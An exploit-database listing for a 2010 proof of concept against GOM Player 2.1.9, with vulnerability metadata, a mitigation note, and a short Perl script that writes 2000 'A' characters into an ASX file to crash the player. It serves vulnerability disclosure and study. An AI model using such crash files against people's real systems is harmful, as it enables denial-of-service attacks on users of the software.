header-logo
Suggest Exploit
vendor:
GOM Player
by:
SarBoT511
7,8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: GOM Player
Affected Version From: 2.1.9
Affected Version To: 2.1.9
Patch Exists: YES
Related CWE: N/A
CPE: 2.1.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

GOM player V 2.1.9 Local crash poc

This exploit is a buffer overflow vulnerability in GOM Player version 2.1.9. It allows an attacker to crash the application by creating a malicious ASX file containing 2000 'A' characters. When the application attempts to open the file, it will crash.

Mitigation:

Update to the latest version of GOM Player.
Source

Exploit-DB raw data:

#!usr/bin/perl
#Exploits title :[GOM player V 2.1.9 Local crash poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[http://en.kioskea.net/telecharger/download-2141-gom-player]
#tested on :[win xp sp2]
#GOM player V 2.1.9


$file="SarBoT511.asx";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";

Navigation

Suggest Exploit

Services By CQR